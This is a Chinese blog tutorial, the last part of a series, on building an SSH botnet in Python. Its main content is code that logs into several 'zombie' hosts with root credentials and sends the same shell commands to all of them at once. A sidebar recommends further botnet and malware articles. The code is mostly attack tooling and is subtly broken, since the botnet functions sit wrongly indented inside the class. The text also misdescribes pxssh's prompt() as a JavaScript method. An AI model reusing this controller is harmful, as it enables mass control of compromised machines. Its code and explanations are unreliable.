【Python脚本进阶】2.2、组建一个SSH僵尸网络(终)

于 2022-07-29 10:57:02 发布
阅读量641 收藏 9
点赞数 1
分类专栏: 【Py】Python脚本 文章标签: python web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/126048556
版权

目录

一、简介

1.1、概述:

二、实现

2.1、函数:

2.2、连接:

2.3、组建僵尸网络

一、简介

1.1、概述:

能通过SSH控制主机, 接下来就要同时控制多台主机

攻击者在达成恶意目的时, 通常会使用被黑掉的计算机群。我们称之为僵尸网络, 因为被黑掉的电脑会像僵尸一样执行指令。为构建僵尸网络, 我们必须引入一个新的概念一类。类的概念是面向编程对象和编程模型的基础。在这一编程模型中, 我们会把各个对象和它们所关联的方法一起实例化。在僵尸网络中, 每个单独的僵尸或client(客户端)都需要有能连上某台肉机,并把命令发送给肉机的能力

二、实现

2.1、函数:

__init__ :是初始化initialization的缩写,在使用类创建对象之后被执行,用于给新创建的对象初始化属性用,如初始化属性的语句就是 self.name=name

prompt是 javascript语言中的一个方法,主要用处是显示提示对话框

2.2、连接:

实现每个单独的僵尸或client(客户端)都需要有能连上某台肉机,并把命令发送给肉机的能力

import optparse
import pxssh


class Client:
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()

    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception as e:
            print(e)
            print('[-] Error Connecting')

    def send_command(self, cmd):
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before

2.3、组建僵尸网络

生成Client()类对象的代码。为了构造client 对象, 需要主机名、用户名,以及密码或密钥。同时, 这个类还要包含维持与肉机连接所需的方法 connect() 、send_ command()和alive()。当引用属于类中的变量时, 是以self 后接变量名的方式表示它的。

为了构建僵尸网络, 要建立一个名为botNet 的全局数组,其中记录了单个client 对象。编写一个名为addClient()的方法,它的输入是主机名、用户和密码,并以此实例化一个client 对象, 并把它添加到botNet 数组里。接下来的botnetComrnand()函数只要一个参数要发布的命令。这个函数遍历整个数组, 把命令发送到botNet 数组中的每个client 上

import optparse
import pxssh


class Client:
    def __init__(self, host, user, password):
        self.host = host
        self.user = user
        self.password = password
        self.session = self.connect()

    def connect(self):
        try:
            s = pxssh.pxssh()
            s.login(self.host, self.user, self.password)
            return s
        except Exception as e:
            print(e)
            print('[-] Error Connecting')

    def send_command(self, cmd):
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before


    
    def botnetCommand(command):
        for client in botNet:
            output= client.send_command(command)
            print('[*] Output from ' + client.host)
            print('[+] ' + output + '\n')

    def addClient(host, user, password):
        client = Client( host, user, password )
        botNet.append(client)

    botNet = []
    addClient('10.10.10.110', 'root', 'toor')
    addClient('10.10.10.120', 'root', 'toor')
    addClient('10.10.10.130', 'root', 'toor')
    botnetCommand('uname -v')
    botnetCommand('cat /etc/issue')
黑色地带(崛起)
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
物联网僵尸网络Gafgyt家族与物联网设备后门漏洞利用
不忘初心,护天下安全!
06-30 1558
Gafgyt(又称BASHLITE,Qbot,Lizkebab,LizardStresser)是一款基于IRC协议的物联网僵尸网络程序,主要用于发起DDoS攻击。它可以利用内置的用户名、密码字典进行telnet爆破和对IOT设备RCE(远程命令执行)漏洞利用进行自我传播。于2015年泄露源码并被上传至github,此后衍生出多个变种,次年对互联网上的IOT设备的总感染数达到100W。Gafgyt家族曾发起过峰值400Gbps的DDoS攻击。截至2019年底,Gafgyt家族仍是除Mirai家族外的最大活跃物
BotenaGo 僵尸网络源码泄露,攻击者武器库又增加
MSB_WLAQ的博客
02-18 8256
2021 年 11 月,AT&T Alien Labs 首次披露 Golang 编写的恶意软件 BotenaGo。最近,该恶意软件的源代码被上传到 GitHub 上,这可能会催生更多的恶意软件变种,预计也会有攻击者利用这些开源代码改进、混淆自己的恶意软件。 背景 2016 年 9 月,Mirai 的源码在某黑客论坛上泄露,紧接着被上传到 GitHub 中。自此以后,Mirai 代码被利用的频率急剧上升,Moobot、Satori、Masuta 等多个恶意软件都将 Mirai 的源码融合进了自己的代码
TL-BOTS:各种僵尸网络的源代码集合-Source code collection
03-24
TL-BOTS 欢迎来到TL-BOTS仓库。 该集合包含大量僵尸网络系列的源文件,工具和其他组件。 从2014/2015年至今,这里涵盖的家庭范围广泛。 此集合中的文件已通过Internet上的分布式拖网收集,并在适用的地方进行了重复数据删除。 免责声明 此存储库中包含的文件仅用于研究目的。 它们按原样提供,不能保证功能。 什么是僵尸网络僵尸网络是受感染设备的网络,它们与命令和控制服务器(C2)联系以接收有关攻击的说明。 僵尸网络有多种用途,包括DDoS,欺诈和加载/传播其他恶意软件。 缓解措施 缓解措施因系统而异,但核心安全原则适用于每个缓解措施。 定期修补,网络分段和正确的设备配置对于维护设备的安全性至关重要。 浏览仓库 存储库分为几个文件夹,其中包含特定类别的活动。 压缩文件可能具有相同或相似的名称,因此每个文件名都包含一个基于文件SHA1哈希值的前6个字符的标识符。 公
puremasuta僵尸网络
煮酒闲谈
01-30 1557
0x00 概述 Satori的威胁背后是新的Masuta僵尸网络,目标是野外路由器. Masuta僵尸网络使用默认凭据作为目标路由器,被分析的一个版本称为“PureMasuta”,依赖于旧的网络管理EDB 38722 D-Link漏洞利用。 0x10 研究发现 NewSky的安全专家认为,最近发现的Satori僵尸网络的运营商正在发起一个新的大规模黑客攻击行动,针对路由器在僵尸
黑客公布物联网僵尸网络恶意软件Mirai源代码
weixin_33901843的博客
07-03 543
物联网(IoT)为黑客提供了广阔的攻击来源,以往发起DDoS攻击的多是僵尸主机或数据中心里的服务器,然而这种现状正在被打破,联网摄像头、家用路由器以及ARM-Based的物联网设备正在成为黑客发起攻击的来源。物联网僵尸网络病毒“Mirai”在上月参与发起了针对KrebOnSecurity安全站点的大规模分布式DDoS攻击,新一类僵尸网络从各种容易被感染的...
开源僵尸网络平台LiteHttp源码分析
systemino的博客
06-13 688
一、简介 如今,黑客越来越多的通过修改开源的病毒源码来实现快速的病毒开发,如Mirai、qbot等公开了源码的病毒,常被黑客用于二次开发,用以攻击。前不久,一起针对巴基斯坦的APT攻击中,发现黑客所使用的攻击样本是通过开源僵尸网络病毒LiteHttp改造而来的,与后者的行为基本一致。分析开源恶意软件源码,能让我们更直接地了解恶意软件的工作原理,从而设计出更好的防护策略,下面,我们就来本地搭建L...
僵尸网络端进程捕获python脚本python版本3.7.3)
12-31
下一代防火墙NGAF发现端有访问僵尸网路的告警,该告警不定时出现,特编写脚本端运行,捕获哪个进程访问僵尸网络目的ip。适合读者:网络信息安全运营工程师,网络信息安全事件溯源等
笨办法学python进阶篇,学习更多python
10-15
总而言之,Python进阶学习是一个持续的过程,包括深入理解语言特性、掌握高级编程概念、熟悉常用库和框架,以及提升代码质量和性能。《笨办法学Python进阶篇提供的不仅仅是理论知识,更是实践操作的引导,是提升...
ssh工具 python脚本.zip
最新发布
03-21
这是一个python脚本工具,主要用于快捷的搜索文档并通过ssh将其上传到指定的ssh服务端,或者从ssh服务端快捷的搜索文档并下载到本地。工具包中有一个 ssh工具.bat 脚本,该脚本可以用于启动 ssh工具.py 脚本,双击...
ssh工具箱 python 脚本
12-23
这是一个python脚本脚本提供了优良的用户交互体验;脚本为用户提供了ssh登录,ssh上传文件,ssh下载文件,ssh公钥配置等功能。脚本可以根据配置文件所记录/提供的ssh信息,快捷的为用户提供ssh登录,文档上传,...
BYOB(建立自己的僵尸网络)-Python开发
05-25
BYOB(建立自己的僵尸网络)有疑问吗? 加入我们的Discord服务器免责声明:此项目应仅用于授权测试或教育目的。 BYOB是一个开放源代码项目,它提供了一个框架,可用于构建自己的僵尸网络入门指南视频教程有疑问吗? 加入我们的Discord服务器免责声明:此项目应仅用于授权测试或教育目的。 BYOB是一个开源项目,它为安全研究人员和开发人员提供了一个框架,以构建和操作基本的僵尸网络,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的了解,从而提高他们的能力。发展c
Python-BYOB建立自己的僵尸网络
08-10
BYOB 是一个开源项目,为安全研究人员和开发者提供一个框架,来构建和运行基本的僵尸网络,以加深他们对每年影响数百万台设备并生成现代僵尸网络的复杂恶意软件的理解,从而提高他们指定应对这些威胁的对策的能力。
Python语言进阶_python进阶_python_
10-03
3. `__init__.py`:标识一个目录为Python包,可以包含初始化代码。 八、并发与异步 1. 多线程:通过`threading`模块实现,但由于GIL(全局解释器锁),Python的多线程在CPU密集型任务上可能效果不佳。 2. 多进程:...
PHP僵尸网络,byob--建立自己的僵尸网络
weixin_39751195的博客
03-28 891
BYOB是一个开源项目,为安全研究人员和开发人员提供构建和运行基本僵尸网络的框架,以加深他们对每年感染数百万设备并产生现代僵尸网络的复杂恶意软件的理解,以提高他们的能力,制定应对这些威胁的对策。它旨在允许开发人员轻松实现自己的代码并添加新功能,而无需从头开始编写RAT(远程管理工具)或 C2(命令和控制服务器)。RAT的关键特性是任意代码/文件可以从C2远程加载到内存中并在目标机器上执行,而无需向...
僵尸网络组建
jklbnm12的博客
10-27 1936
无论多么庞大的系统,都是由一个个具体的元素组成的,僵尸网络也不例外。我们在讨论系统的组建时,一般会讨论两个方面——“组成系统的元素都是什么”以及“这些元素是如何相互联系起来的”。对于僵尸网络来说,则分别对应着僵尸网络的节点和控制方式。本节会对这两个方面分别进行介绍。 节点 僵尸网络由大量功能节点共同组成,这些节点可能是普通PC、服务器或者移动设备 这三种节点分别有其各自的特性,下面依次进行介绍。 误区:DDoS攻击都来自PC组成的僵尸网络 “ DDoS攻击都是由僵尸网络发起的”,这几乎是一个安全领域.
僵尸网络
Transient1984的专栏
11-12 1120
 僵尸网络  Botnet  僵尸网络是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序),从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。  在Botnet的概念中有这样几个关键词。“bot程序”是robot的缩写,是指实现恶意控制功能的程序代码;“僵尸计算机”就是被植入bot的计算机;“控制服务器(Control Server)”是指控制和通信的中心服务器,
2-用Python搭建一个SSH僵尸网络
Just have fun
07-19 3727
源代码:https://github.com/LToddy/penetrationtestMorris蠕虫有三种攻击方式,其中之一就是用常见的用户名和密码尝试登录RSH(remote shell)服务。 RSH是1998年问世的,它为系统管理员提供了一种很棒(尽管不安全)远程连接一台机器,并能在主机上运行一系列端命令对它进行管理的方法。后来人们在RSH中增加了一个密钥加密算法,以保护其经
Python构建SSH僵尸网络
aiya2015的博客
03-18 279
要构建SSH僵尸网络,先从SSH自动登陆脚本开始写起。 其中要用到 pexpect 模块 先看一下代码: 1 ssh_newkey = 'Are you sure you want to continue connecting' 2 child = pexpect.spawn('ssh root@localhost') #一看就懂,执行命令 3 ret = chil...
Python黑客攻防(十三)构建SSH僵尸网络
qq_43681532的博客
08-02 826
注:本篇文章仅供学习交流,请勿用于非法用途。参考:《Python绝技:运用Python成为顶级黑客》。 前言 攻击者在达成恶意目的时,通常会使用被黑掉的计算机群。我们称之为僵尸网络”,因为被黑掉的电脑会像僵尸一样执行指令。 为构建僵尸网络,我们必须引入一一个新的概念一类。 类的概念是面向编程对象和编程模型的基础。在这一编程模型中,我们会把各个对象和它们所关联的方法一起实例化。 在我们的僵尸网络中,每个单独的僵尸或client(客户端)都需要有能连上某台肉机,并把命令发送给肉机的能力。 代码 # coding
编写一个python脚本,远程连接ssh
09-26
### 回答1: 可以尝试使用Python的paramiko库来编写一个Python脚本,它可以实现远程连接SSH的功能。可以参考以下示例代码:import paramiko#create SSH clientssh = paramiko.SSHClient()#Auto add host keyssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())#connect to remote hostssh.connect(hostname='remote_hostname_or_ip', username='username', password='password')#run commandstdin, stdout, stderr = ssh.exec_command('ls -l')#print outputfor line in stdout.readlines(): print line#close ssh connectionssh.close() ### 回答2: 要编写一个可以远程连接SSHPython脚本,你可以使用Paramiko库来实现。Paramiko库是一个用于SSHv2协议编程的Python实现。 首先,需要安装Paramiko库。在端中运行以下命令来安装Paramiko库: ``` pip install paramiko ``` 然后,在Python脚本中导入Paramiko库: ```python import paramiko ``` 创建一个SSHClient对象,并连接到远程主机: ```python client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect('远程主机IP', port=22, username='用户名', password='密码') ``` 在建立SSH连接后,你可以执行远程命令: ```python stdin, stdout, stderr = client.exec_command('远程命令') ``` 可以通过`stdout.read()`方法读取执行结果: ```python print(stdout.read().decode()) ``` 最后,记得在使用完SSH连接后关闭连接: ```python client.close() ``` 这是一个简单的示例,可以启发你编写一个脚本来远程连接SSH。当然,还有一些其他的高级用法,如上传和下载文件等,你可以查看Paramiko库的官方文档来进一步学习和了解。 ### 回答3: 要编写一个可以远程连接SSHPython脚本,你可以借助paramiko库来实现。Paramiko是一个支持SSHv2协议的Python模块,它可以让你通过SSH连接到远程服务器,并执行命令。 首先,你需要在你的Python环境中安装paramiko库。你可以通过运行以下命令来安装它: ``` pip install paramiko ``` 接下来,你可以使用以下代码编写一个远程连接SSH脚本: ```python import paramiko # 创建SSH客户端实例 client = paramiko.SSHClient() # 自动添加和保存远程服务器的 SSH RSA 密钥 client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 连接远程服务器 client.connect('your_remote_server_ip', username='your_username', password='your_password') # 执行命令 stdin, stdout, stderr = client.exec_command('your_command') # 打印命令输出结果 print(stdout.read().decode()) # 关闭连接 client.close() ``` 在这个脚本中,你需要将`your_remote_server_ip`替换为远程服务器的IP地址,`your_username`替换为登录远程服务器的用户名,`your_password`替换为密码,`your_command`替换为你希望远程执行的命令。 当你运行这个脚本时,它将会连接到远程服务器,执行指定的命令,并将命令的输出结果打印到控制台上。 但需要注意的是,为了安全起见,推荐使用SSH密钥对进行身份验证,而不是使用密码登录。你可以使用paramiko库提供的`keyfile`参数来指定SSH私钥文件。 希望对你有帮助!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值